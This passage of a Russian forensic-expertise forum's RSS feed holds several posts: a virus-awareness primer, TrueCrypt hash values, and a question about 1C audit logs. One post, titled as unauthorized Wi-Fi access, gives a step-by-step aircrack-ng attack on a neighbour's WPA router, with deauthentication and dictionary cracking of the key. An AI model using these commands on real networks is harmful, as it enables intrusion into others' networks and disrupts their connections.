						&lt;p&gt;Подскажите, сколько стоит экспертиза?&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;Эксперт написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;Добрый день!&lt;br /&gt;Стоимость диагностики - 1000 руб., стоимость заключения 2500 руб. Сроки 5-7 рабочих дней.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Wed, 16 Sep 2015 10:02:50 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=133#p133</guid>
		</item>
		<item>
			<title>Несанкционированный доступ к wifi</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=117#p117</link>
			<description>&lt;p&gt;Тестирование WiFi сетей с помощью пакета aircrack-ng&lt;/p&gt;
						&lt;p&gt;source: &lt;a href=&quot;http://antik.mybb.ru/viewtopic.php?id=8&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://antik.mybb.ru/viewtopic.php?id=8&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Вся информация дана исключительно в ознакомительных целях&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;На практике был использованы утилиты из дистрибутива Kali Linux&lt;/p&gt;
						&lt;p&gt;Итак, картина маслом:&lt;/p&gt;
						&lt;p&gt;74:DE:2B:77:19:4D - я.&lt;br /&gt;18:F4:6A:9B:BF:59 - сосед.&lt;br /&gt;C8:64:C7:53:02:0C - нужная нам точка доступа (роутер).&lt;br /&gt;Роутер работает на 5 канале. Шифрование WPA/WPA2. Отображаемое имя DIR-300&lt;/p&gt;
						&lt;p&gt;Запускаем беспроводной интерфейс в режиме мониторинга&lt;/p&gt;
						&lt;p&gt;airmon-ng start wlan0&lt;/p&gt;
						&lt;p&gt;Слушаем (мониторим) эфир&lt;/p&gt;
						&lt;p&gt;Предварительная разведка&lt;br /&gt;airodump-ng mon0&lt;br /&gt;Останавливаем мониторинг клавишами Ctrl+C&lt;/p&gt;
						&lt;p&gt;Слушаем пакеты только для конкретной точки доступа&lt;br /&gt;airodump-ng --bssid C8:64:C7:53:02:0C mon0&lt;/p&gt;
						&lt;p&gt;Начинаем запись (дампинг) пакетов в файлы packets*&lt;br /&gt;airodump-ng -w packets -c 5 mon0&lt;/p&gt;
						&lt;p&gt;Или лучше вести выборочную запись&lt;br /&gt;airodump-ng --bssid C8:64:C7:53:02:0C -w packets -c 5 mon0&lt;br /&gt;Здесь&lt;br /&gt;--bssid C8:64:C7:53:02:0C точка доступа&lt;br /&gt;-c 5 номер канала&lt;/p&gt;
						&lt;p&gt;Деаутентифицируем соседа&lt;/p&gt;
						&lt;p&gt;Не останавливая записи пакетов, открываем новую консоль и создаём помехи соседу.&lt;br /&gt;aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c 18:F4:6A:9B:BF:59 --ignore-negative-one mon0&lt;/p&gt;
						&lt;p&gt;Подбираем PSK ключ по словарю&lt;/p&gt;
						&lt;p&gt;Брутим полученные даные packets-01.cap с помощью словаря passwords.txt&lt;br /&gt;aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets-01.cap&lt;/p&gt;
						&lt;p&gt;Если было проведено несколько попыток записи, то можно анализировать группу файлов&lt;br /&gt;aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets*.cap&lt;/p&gt;
						&lt;p&gt;Здесь passwords.txt - текстовый файл, в каждой строке которого записан один пароль. Можно создать собственный словарь или скачать из Интернета.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (Росгостехпизднадзор)</author>
			<pubDate>Tue, 15 Sep 2015 13:56:50 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=117#p117</guid>
		</item>
		<item>
			<title>Экспертиза 1С Бухгалтерия 8.2 Просмотр логов: кто, действия, изменения</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=109#p109</link>
			<description>&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;counter написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;Для этого открываем пункт главного меню «Сервис», и далее выбираем «Журнал регистрации». Замечу что, по умолчанию опция журнала регистрации включена. Однако, иногда, ошибочно полагая, что регистрация приведет к понижению производительности, некоторые администраторы ее отключают. Тем самым лишаясь полезной функциональности.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;
						&lt;p&gt;То есть, если Журнал регистрации временно отключить, за это время можно сделать изменения, которые останутся нигде неучтенными?&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Иван)</author>
			<pubDate>Sun, 11 Jan 2015 19:29:07 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=109#p109</guid>
		</item>
		<item>
			<title>Ликбез о компьютерных вирусах</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=108#p108</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Ликбез о компьютерных вирусах&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;В процессе знакомства с компьютером Вы уже наверняка встретились с понятиями &amp;quot;компьютерный вирус&amp;quot;, &amp;quot;троянская программа&amp;quot;, &amp;quot;троянец&amp;quot; (он же &amp;quot;троян&amp;quot;) и, возможно, с некоторыми другими страшными словами, которыми обычно пугают неопытных пользователей. Надо сказать, чаще всего пугают не зря.&lt;/p&gt;
						&lt;p&gt;Сначала хотелось бы немного углубиться в технологию и историю вопроса. Вы знаете, что компьютер работает исключительно под управлением программ (программного обеспечения, софта). Это делает его по-настоящему универсальным устройством, которое может играть музыку как музыкальный центр, показывать кино как телевизор, печатать как пишущая машинка и изображать еще некоторые полезные вещи. Так вот, программы пишут программисты, это давно не секрет, а программисты – тоже люди, которым хочется иногда придумать и сделать что-то эдакое… Когда компьютеры были еще большими и использовались для выполнения сложных расчетов, операторы придумывали программы, которые заставляли лампочки (да, тогда еще были видны ламповые внутренности компьютера) хитрым образом мигать или зажигаться так, что получались слова. В фильме &amp;quot;Служебный роман&amp;quot; на стене у секретарши висит &amp;quot;Джоконда&amp;quot;, напечатанная на простом принтере, который мог печатать только буквы (вроде пишущей машинки). Для составления программы, которая напечатала бы такое, надо было хорошо знать возможности техники и особенности программирования.&lt;/p&gt;
						&lt;p&gt;Так вот, невинные шалости программистов с повсеместным распространением компьютеров и развитием их возможностей начали приобретать все более зловещую направленность. Появились программы (тоже поначалу шуточные), которые играли музыку, печатали разные текстики (вроде &amp;quot;Как вы все мне надоели!&amp;quot;), показывали улыбающиеся рожи, вращали слэши (наклонные линии в путях файлов) и делали много других более или менее раздражающих вещей. До тех пор, пока человек, сидящий за компьютером, мог контролировать работу этих программулек и знал, что и зачем он запустил, все было нормально. Но потом появились программы, которые не спрашивая ничьего разрешения запускались, копировались в разные места диска и &amp;quot;заражали&amp;quot; другие программы (заменяли часть полезного кода рабочей программы своим или изменяли его). С этого момента и нужно начинать разговор о &amp;quot;компьютерных вирусах&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Компьютерным вирусом называется программа (некоторая совокупность выполняемого кода/инструкций), которая способна создавать свои копии (не обязательно полностью совпадающие с оригиналом) и внедрять их в различные объекты/ресурсы компьютерных систем, сетей и т.д. без ведома пользователя. При этом копии сохраняют способность дальнейшего распространения. (Это вроде как определение).&lt;/p&gt;
						&lt;p&gt;Компьютерные вирусы, как и биологические, имеют три задачи – заразить, выполнить, размножиться.&lt;/p&gt;
						&lt;p&gt;Заражается компьютер снаружи, когда человек запускает на исполнение некую программу, которая либо заражена вирусом (т.е. при ее выполнении запускается и вирус), либо сама является вирусом.&lt;/p&gt;
						&lt;p&gt;Выполнять вирус может разные действия. Некоторые вирусы просто осыпали буквы с монитора или рисовали летающий мячик. Такие считаются наиболее безвредными. Другие могут переименовывать файлы на диске, стирать их. Эти, без сомнения гораздо опаснее. Наконец, недавно появился вирус &amp;quot;Win95.CIH&amp;quot;, который может испортить микросхему BIOS Вашего компьютера (хотя уже давно ходят слухи о том, что некоторые вирусы могут портить винчестеры, раскачивая их считывающие головки). Тут трудно сказать, что хуже – потеря информации или выход из строя компьютера (хотя бы и можно было его починить).&lt;/p&gt;
						&lt;p&gt;И, наконец, вирус размножается, то есть дописывает себя везде, где он имеет шанс выполниться.&lt;/p&gt;
						&lt;p&gt;В настоящее время, с развитием операционной системы и программного обеспечения появилось великое множество возможностей для вирусописателей.&lt;/p&gt;
						&lt;p&gt;Сохраняют свои позиции вирусы &amp;quot;старого&amp;quot; типа, которые надо один раз запустить, после чего они постоянно при загрузке компьютера активно включаются в работу и начинают заражать все исполняемые файлы, которые попадаются им под руку.&lt;/p&gt;
						&lt;p&gt;Появились вирусы, использующие возможности внутреннего языка программ серии Microsoft Office. Да, такие программки интересны и могут облегчить Вам жизнь. Но вот я как-то написал программу для Word (макрос иными словами), которая переименовывала файлы в заданном каталоге так, как было надо мне (стояла задача все графические файлы перенумеровать). И, в процессе, не закончив еще работу, я ее запустил. Результат – все файлы в корневом каталоге системного диска переименованы в &amp;quot;1.jpg&amp;quot;, &amp;quot;2.jpg&amp;quot; и так далее – до 13 номера. Естественно, система после этого не работала никак, поскольку были потеряны стандартные имена базовых файлов. Слава богу, удалось их восстановить (почти по памяти). Представьте, что Вы откроете документ (текст) в формате Word, которые сделает Вам такую гадость? И часто ли Вы задумываетесь, что Вам прислали по электронной почте? (Особенно когда там написано &amp;quot;Заработай 1000 долларов!&amp;quot;)&lt;/p&gt;
						&lt;p&gt;Так как все больше людей попадает в Интернет, то последний становится вероятным рассадником заразы. Если в машинном зале моего института можно было просто засунуть дискету в дисковод, чтобы заразить ее, то теперь также достаточно зайти на некий сайт, ответить &amp;quot;Да&amp;quot;, нажав на кнопку формы, чтобы заполучить какую-нибудь гадость.&lt;/p&gt;
						&lt;p&gt;Наиболее распространен сейчас вид почтовых вирусов, когда играют на любопытстве людей. Например, Вам приходит письмо с признанием в любви и приложенными фотографиями. Если Вы читали журналы и слышали о таких письмах, то Вы, конечно, немедленно сотрете письмо от незнакомого человека. Однако, первое движение – посмотреть, что же там пришло. И вот, все Ваши фотографии и музыка пропали, а вместо них – злобный вирус &amp;quot;I Love You&amp;quot; (или еще какой, похожий на него). А, кроме того, он еще и пошлет себя всем, кто записан в Вашей адресной книге (эдакое самоходное &amp;quot;письмо счастья&amp;quot;). А может еще и винчестер Вам почистить, чтобы не скучно было. (Есть и такие любители пошутить).&lt;/p&gt;
						&lt;p&gt;Вирусы отличаются от троянских программ тем, что работают на себя. Троянцы же работают на чужого дядю. Получить троян можно так же, как и вирус. Только он, скорее всего, не будет проявлять себя открыто. Он просто очень тихо пошарит у Вас на диске, найдет пароли (от Интернета и не только), а потом отошлет их тому, кто его запустил в обращение. Вы будете потом долго удивляться, куда деваются деньги с Вашего счета и как это Вы, гуляя с подругой, одновременно сидели в Интернете. Кроме того, такая программа может давать злоумышленнику полный доступ к Вашим программам и данным. Последнее, что я видел, была функция выдвижения лотка CD-ROMа. Причем на всех зараженных компьютерах одновременно.&lt;/p&gt;
						&lt;p&gt;Методы борьбы с вирусами и троянцами описаны во многих местах. К сожалению, единственный действенный метод – не включать компьютер вовсе. Можно еще посоветовать ничего не устанавливать и ничего не запускать. Только тогда какой смысл иметь компьютер?&lt;/p&gt;
						&lt;p&gt;Поэтому широко процветают Антивирусы – программы, призванные обнаруживать и удалять все пакости с Вашего компьютера. Наиболее представительными, на мой взгляд, являются DrWeb (wwwdials.ru), Antiviral Tolkit Pro (AVP) (wwwavp.ru), ADInf (wwwdials.ru, wwwadinf.com). Первые две программы постоянно получают всяческие международные сертификаты и вообще считаются одними из лучших. Кроме того, на указанных выше сайтах Вы можете найти множество информации о вирусах. А главное – обновления антивирусных баз. В революционном деле борьбы с вирусами главное – иметь свежий антивирус. Вот, например, недавно я умудрился заполучить троянца. Антивирус его сперва не нашел. А когда я его обновил, то есть скачал в Интернете набор свежих антивирусных баз с последними дополнениями, то троянец был немедленно обнаружен и стерт.&lt;/p&gt;
						&lt;p&gt;Также важно все-таки не запускать неизвестно что. Хотя, лично мне трудно соблюдать этот свой совет. Из-за неуемного любопытства я постоянно что-то скачиваю в Интернете и запускаю. Или приношу домой разные диски и запускаю программы оттуда. Из-за этого на работе на меня косятся с подозрением и постоянно подозревают, что именно я &amp;quot;уронил&amp;quot; систему, принес вирус и тому подобное. Если Вы тоже хотите активно работать, то по крайней мере, установите антивирусный монитор (который отличается от антивирусного сканера). Когда Вы запускаете тот же DrWeb на проверку дисков – это антивирусный сканер. А в комплекте с ним идет некий Spider – вот это антивирусный монитор. (Так же и с AVP. С ним в комплекте поставляется AVP monitor). Антивирусный монитор загружается вместе с Вашей операционной системой и постоянно проверяет все запускаемые Вами файлы и файлы, сохраняемые на диск. Если он вдруг видит вирус, он Вам об этом громко скажет. А потом вылечит. Или не вылечит, а просто сотрет. Это зависит от особенностей вируса и возможностей антивируса. А еще от того, как Вы его настроите (прочтите инструкцию!). Таким образом один раз я не стал скачивать зараженную программу из Интернета. А на работе мы отловили злостного рассадника вируса – секретаршу, которая всем приносила дискету с просьбой распечатать документ и жалобами на то, что ни у нее, ни у тех, к кому она ходила текст не печатается. После захода в наш отдел, был проведен экстренный месячник борьбы с вирусами. Все проверенные компьютеры были заражены. Причем все документы Word содержали код вируса. К счастью, конкретно этот вирус лечился.&lt;/p&gt;
						&lt;p&gt;Понятно, что тотальная проверка файлов несколько замедляет работу, но, поверьте мне, дело того стоит.&lt;/p&gt;
						&lt;p&gt;Могу еще порекомендовать Stop! (wwwdizet.com.ua). Этот продукт специально предназначен для борьбы с троянскими программами и недавно нашел у меня застарелый троянец, который прятался в генераторе www страниц. (правда, я им так и не пользовался).&lt;/p&gt;
						&lt;p&gt;Однако, при борьбе с вирусами не стоит впадать в дикую крайность и стирать все подряд. Я пробовал, результат &amp;quot;упавшая&amp;quot; система и никакого эффекта. На этом построено действие &amp;quot;психологических&amp;quot; вирусов, рассчитанных именно на то, что Вы своими руками порушите систему. Если Вам придет письмо с сообщением о том, что по Сети бродит страшный вирус и с предложением срочно скачать специальный антивирус, очень высока вероятность, что именно этот &amp;quot;антивирус&amp;quot; и есть троянец или злобный вирус.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Что такое компьютерный вирус?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Компьютерный вирус – программа, способная к самовоспроизводству и самораспространению. Как правило, вирус небольшого размера (так легче маскироваться в системе). Раньше вирусы попадали в компьютер через зараженные дискеты, сегодня наиболее популярные пути доставки – это электронная почта, Интернет и локальные сети. Диапазон «применения» вирусов очень широк: от нехитрых шуток, таких как переворот экрана на 180 градусов, до опасных действий, приводящих к уничтожению данных иди нарушению функционирования системы. В большинстве случаев вирусы обычно стремятся попасть в оперативную память, и уже из этого удобного «командного пункта» перехватывают управление другими запущенными приложениями или модулями операционной системы, препятствуя их нормальной работе. Особо агрессивные экземпляры приступают к методичному уничтожению отдельных файлов или даже целиком всей информации, записанной на жестком диске.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Откуда берутся вирусы?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Программисты-вирусописатели создают и распространяют свои творения по самым разным причинам. Одни хотят таким необычным способом подшутить над своими друзьями. Другие пишут вирусы по заданию преподавателя (в рамках курса обучения языку программирования) – и в результате оказывается зараженной вся институтская локальная сеть, а зачастую вирусы вырываются в «большой» Интернет. Непризнанные гении создания кода стремятся показать свои таланты всему миру. Однако в последнее время вирусописание превратилось в бизнес: самые опасные вирусы создаются киберпреступниками с целью зарабатывания денег. Особой любовью профессиональных мошенников пользуются трояны (см. врезку на стр. ???), которые, попав в систему, шпионят за компьютером ничего не подозревающего пользователя, передавая собранные данные о паролях или ПИН-кодах своим хозяевам, либо выполняют другие вредоносные действия.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Как вирусы попадают в компьютер?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Чтобы вирус начал свою разрушительную деятельность, он должен сначала попасть в ваш компьютер. Для этого существует несколько путей:&lt;/p&gt;
						&lt;p&gt;- через зараженный носитель информации, например USB-флэшку или оптический диск;&lt;/p&gt;
						&lt;p&gt;- через другой компьютер в локальной сети;&lt;/p&gt;
						&lt;p&gt;- через электронную почту. Большинство вредителей прячутся в файлах, прикрепленных к письму, и активируются в тот момент, когда любопытный пользователь открывает это вложение. Поскольку общение через e-mail очень популярно, этот метод распространения вредителей наиболее эффективен;&lt;/p&gt;
						&lt;p&gt;- через Интернет – особенно опасны трояны, которые прячутся в бесплатном софте. Пользователь, позарившийся на «халяву», получает в придачу вредителя. Иногда для заражения ПК достаточно просто открыть веб-страницу. Вирусы «попутной загрузки» (по англ. Drive-by-Downloads) используют для этого уязвимые места веб-браузеров – например, маскируются под рисунок, и как только вы открываете его для просмотра, браузер выполняет вредоносный код и – вирус уже поражает вашу систему.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Как понять, что ПК заражен вирусом?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Есть ряд симптомов, типичных для заражения компьютера той или иной вирусной «инфекцией». Обращайте внимание на непривычное поведение вашего ПК:&lt;/p&gt;
						&lt;p&gt;- на экране неожиданно появляются странные сообщения или картинки;&lt;/p&gt;
						&lt;p&gt;- ПК вдруг начинает издавать посторонние звуки или проигрывать музыку в том момент, когда медиапроигрыватель отключен;&lt;/p&gt;
						&lt;p&gt;- дисковод для чтения оптических дисков начинает открываться-закрываться;&lt;/p&gt;
						&lt;p&gt;- самопроизвольно запускаются программы;&lt;/p&gt;
						&lt;p&gt;- операционная система не загружается;&lt;/p&gt;
						&lt;p&gt;- целиком исчезают файлы и папки;&lt;/p&gt;
						&lt;p&gt;- содержание файлов и папок изменяется;&lt;/p&gt;
						&lt;p&gt;- выполняется более частое, чем обычно, обращение к жесткому диску – индикатор записи/чтения данных мигает без остановки;&lt;/p&gt;
						&lt;p&gt;- браузер не загружает веб-страницы, а в некоторых случаях не удается закрыть окно программы;&lt;/p&gt;
						&lt;p&gt;- друзья и знакомые получают от вас сообщения, которые вы не посылали – типичное поведения почтового червя, выполняющего несанкционированную рассылку самого себя по всем адресам, обнаруженным им в адресной книге.&lt;/p&gt;
						&lt;p&gt;Внимание: будьте осторожны с сообщениями, не имеющим адреса отправителя или даты отправления/получения. Ни в коем случае не открывайте файлы, вложенные в подобные письма!&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Мой компьютер заражен! Что делать?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Если вы заметили, что компьютер ведет себя подозрительно, выполните следующие шаги:&lt;/p&gt;
						&lt;p&gt;Отключите ПК от Интернета и локальной сети, чтобы вредоносная программа не могла распространяться дальше.&lt;/p&gt;
						&lt;p&gt;Сохраните важные документы на внешнем накопителе (винчестере, оптическом или флэш-диске) и пометьте его как еле или компакт-диске и пометьте носитель информации как зараженный.&lt;/p&gt;
						&lt;p&gt;Запустите антивирусную программу, чтобы она проверила жесткий диски вашего компьютера, обнаружила и уничтожила вредителей.&lt;/p&gt;
						&lt;p&gt;После прохождения «курса лечения» просканируйте носитель, созданный в шаге 2, чтобы не занести вирус в систему повторно. Если избавиться от вируса не удалось, перешлите зараженный файл разработчикам антивируса. Как правило, создание «противоядия» занимает несколько часов.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Как защититься от вирусной «инфекции»?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;С помощью антивирусной программы! Это программное обеспечение не только находит и удаляет вирусы, но и препятствует их проникновению на ПК. Если антивирусное ПО не установлено, пользователь может обратить внимание на деятельность вирусов слишком поздно, когда они натворят порядочно бед в системе.&lt;/p&gt;
						&lt;p&gt;Если на компьютере установлено антивирусное программное обеспечение, оно запускается вместе с операционной системой и функционирует в фоновом режиме во время всего сеанса работы пользователя. Рекомендация: пользователь должен через определенные промежутки времени полностью проверять жесткие диски своего ПК с помощью антивирусного сканера (этот модуль есть во всех антивирусных программах). Кроме того, необходимо настроить «защитника» так, чтобы он выполнял проверку всех вложений в сообщениях, которые приходят по электронной почте.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Как функционируют антивирусные программы?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Как антивирусные программы распознают вирусы?&lt;/p&gt;
						&lt;p&gt;Для этого используются три методики:&lt;/p&gt;
						&lt;p&gt;Выявление по сигнатуре вируса. Все вирусы имеют свой оригинальный программный код, с помощью которого их можно идентифицировать – как, например, людей по отпечаткам пальцев или по генетическому коду. Антивирусная программа сравнивает подозрительные файлы с сигнатурами известных вирусов, которые она берет из постоянно обновляемой базы данных. Этот классический метод распознавания вредоносных объектов используют практически все антивирусные программы. Недостаток данной методики заключается в том, что она позволяет обнаружить только известные вирусы. Здесь можно провести аналогию с прививкой от гриппа: в новом сезоне она теряет свою эффективность, потому что появляются новые штаммы вируса.&lt;/p&gt;
						&lt;p&gt;Разработчики антивирусных программ должны как можно быстрее добавлять в базы новые сигнатуры появляющихся каждый день вирусов и вырабатывать «противоядие». Не все компании справляются с этим в равной мере успешно: так, победителю теста ComputerBild №10/2007 потребовалось на обезвреживание нового вируса менее одного часа, а самой «медленной» антивирусной программе – более двенадцати часов.&lt;/p&gt;
						&lt;p&gt;Эвристический метод позволяет современным антивирусным программам распознавать вредителей, не зная их сигнатуры. Такой метод позволяет обнаруживать новые вирусы на основании их поведения – причем еще до того, как они нанесут вред компьютеру. Программа, выполняющая характерные для вируса подозрительные действия, проверяется, среди прочего, на структуру и логику программирования. Особое внимание уделяется командам, которые она отдает компьютеру: например, изменить другие программные файлы, создать или откорректировать записи в системном реестре, модифицировать или удалить системные файлы.&lt;/p&gt;
						&lt;p&gt;Антивирусная программа помещает «подозрительные» программы в безопасную область – в так называемый «карантин». Даже если вредитель активизируется, выйти за пределы карантина он не сможет, и все данные на компьютере останутся в целости и сохранности. Вирус будет находиться в «тюрьме» до тех пор, пока антивирусная программа не дождется поступления новых сигнатур и не сможет приступить к лечению изолированных объектов.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Что еще нужно сделать для защиты от вирусов?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Антивирусная программа не гарантирует абсолютной защиты, поэтому следует предпринять дополнительные меры безопасности:&lt;/p&gt;
						&lt;p&gt;Установите сетевой экран (брандмауэр). Эта программа наблюдает за поступающими из Интернета и отправляемыми в него данными. В белом списке содержится перечень программ, которым доступ в Сеть разрешен. Если какое-либо приложение, не внесенное в этот список, попытается тайно установить соединение с Сетью, брандмауэр забьет тревогу. Доступ к Интернету на вашем ПК осуществляется через маршрутизатор? Это неплохо, поскольку подобные устройства оснащены аппаратными брандмауэрами, контролирующими поток поступающих из Сети данных. Однако оптимально для повышения безопасности установить программный брандмауэр.&lt;/p&gt;
						&lt;p&gt;Установите программу, специализирующуюся на поиске шпионов. Этот компонент входит в состав многих профессиональных решений для защиты от интернет-угроз. Так, например, в пакете Kaspersky Internet Security SuiteV содержатся модули «Сетевой экран» и «Антишпион».&lt;/p&gt;
						&lt;p&gt;Установите программу для обнаружения руткитов. Об этих вредоносных приложениях мы подробно писали в ComputerBild № 03/2008, но напомним, что обычный антивирус с их обнаружением не справляется – требуется специальный софт. Проведенное нами тестирование показало, что лучшими борцами с руткитами являются программы GMER и AVG Anti-Rootkit.&lt;/p&gt;
						&lt;p&gt;Следите за тем, чтобы базы антивирусных программ всегда были в актуальном состоянии. Операционная система Windows, веб-браузеры и прикладные программы должны регулярно обновляться с целью ликвидации лазеек, через которые может проникнуть вредоносное ПО. Самый лучший способ – использование функции автоматического обновления, которой оснащены практически все современные программы – ее обязательно следует активировать! В Windows этот компонент так и называется – «Автоматическое обновление» (запускается из Панели управления).&lt;/p&gt;
						&lt;p&gt;Создайте для интернет-серфинга виртуальную машину – компьютер в компьютере. Воспользуйтесь для этого бесплатной программой Virtual PC. Однако такую защиту тоже нельзя считать абсолютно надежной: существуют вредоносные программы, которые наловчились распознавать и выключать виртуальные ПК.&lt;/p&gt;
						&lt;p&gt;Можно ли установить на один ПК несколько антивирусных программ?&lt;/p&gt;
						&lt;p&gt;Нет! Ни в коем случае не инсталлируйте больше одной антивирусной программы. Если запустить их одновременно, они будут мешать работе друг друга, лишая ПК всякой защиты. Возможно ложное срабатывание, когда одна антивирусная программа проверяет список сигнатур другой программы и находит там вирусы.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Какие бывают вирусы?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;1 Backdoor (по англ. – «черный ход») – эта вредоносная программа обходит систему защиты ПК, используя уязвимости в коде программ, установленных в вашей системе. Получив контроль над компьютером, агрессор инсталлирует вредоносные программы или совершает другие действия, для выполнения которых он изначально создавался.&lt;/p&gt;
						&lt;p&gt;2 Бот-неты – эти вирусы изменяют содержимое загрузочного сектора жесткого диска, чтобы помешать запуску операционной системы.&lt;/p&gt;
						&lt;p&gt;3 Номеронабиратели – они умеют самостоятельно дозваниваться по заданным разработчиком вируса телефонным номерам, незаметно для пользователи «накручивая» плату за международные или междугородние переговоры. Впрочем, этот вид вредоносного ПО работает, только если ваш компьютер подключается к Сети через телефонный модем, что сейчас становится редкостью.&lt;/p&gt;
						&lt;p&gt;4 Фишинг – это мошеннические сообщения, распространяемые через электронную почту, цель которых – вымогание денег («помогите собрать деньги на операцию больному ребенку») либо распространение клеветы.&lt;/p&gt;
						&lt;p&gt;5 Кейлогеры – это перехватчики произведенных пользователем нажатий клавиш на клавиатуре. Собранная информация – пароли или ПИН-коды для выполнения онлайновых банковских операций – пересылается владельцу вируса.&lt;/p&gt;
						&lt;p&gt;6 Макровирусы – представляют собой выполняющие запрограммированную последовательность действий макросы, которые встраиваются в документы – например, Microsoft Office. Макрос, автоматически вставляющий адреса в список рассылки, можно модифицировать таким образом, чтобы он стирал или изменял текст рассылаемого сообщения.&lt;/p&gt;
						&lt;p&gt;7 Полиморфные вирусы умеют самостоятельно изменять собственный программный код, маскируясь от обнаружения антивирусными программами.&lt;/p&gt;
						&lt;p&gt;8 Руткиты проникнув на ваш ПК, они тщательно скрывают следы своего присутствия, открывая лазейки для проникновения других вредоносных программ. Они настолько сильны, что в состоянии захватить управление всей операционной системой.&lt;/p&gt;
						&lt;p&gt;9 Червь – тип вредоносного ПО, способный самостоятельно распространяется по компьютерным сетям, прикрепляясь к сообщениям электронной почты.&lt;/p&gt;
						&lt;p&gt;10 Шпион, попав на ПК, отыскивает личные данные пользователя, например историю посещения веб-страниц, и отсылает их своему хозяину.&lt;/p&gt;
						&lt;p&gt;11 Adware – вид программного обеспечения, при использовании которого пользователю принудительно показывается реклама. Вирусом не является, так как вреда компьютеру причинить не может.&lt;/p&gt;
						&lt;p&gt;12 Трояны – эти программы стремятся убедить пользователя в том, что выполняют очень полезные и нужные функции – но на самом деле у них совершенно другие задачи. Троянские программы загружают на ПК вредоносный софт или шпионят за действиями пользователя. Трояны не могут самостоятельно распространяться, в этом их отличие от вирусов и червей.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Thu, 27 Nov 2014 07:16:18 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=108#p108</guid>
		</item>
		<item>
			<title>TrueCrypt. Скрытое предупреждение о причастности АНБ</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=106#p106</link>
			<description>&lt;p&gt;Из твиттера Matthew Green (один из аудиторов TrueCrypt):&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; @SteveBellovin @mattblaze @0xdaeda1a I think this is legit.&lt;/p&gt;
						&lt;p&gt;TrueCrypt Setup 7.1a.exe:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; sha1: 7689d038c76bd1df695d295c026961e50e4a62ea&lt;br /&gt;&amp;#160; &amp;#160; md5: 7a23ac83a0856c352025a6f7c9cc1526&lt;/p&gt;
						&lt;p&gt;TrueCrypt 7.1a Mac OS X.dmg:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; sha1: 16e6d7675d63fba9bb75a9983397e3fb610459a1&lt;br /&gt;&amp;#160; &amp;#160; md5: 89affdc42966ae5739f673ba5fb4b7c5&lt;/p&gt;
						&lt;p&gt;truecrypt-7.1a-linux-x86.tar.gz:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; sha1: 0e77b220dbbc6f14101f3f913966f2c818b0f588&lt;br /&gt;&amp;#160; &amp;#160; md5: 09355fb2e43cf51697a15421816899be&lt;/p&gt;
						&lt;p&gt;truecrypt-7.1a-linux-x64.tar.gz:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; sha1: 086cf24fad36c2c99a6ac32774833c74091acc4d&lt;br /&gt;&amp;#160; &amp;#160; md5: bb355096348383987447151eecd6dc0e&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Владимир Ильич)</author>
			<pubDate>Thu, 04 Sep 2014 21:05:48 +0400</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=106#p106</guid>
		</item>
		<item>
			<title>Юридический статус Wi-Fi</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=104#p104</link>
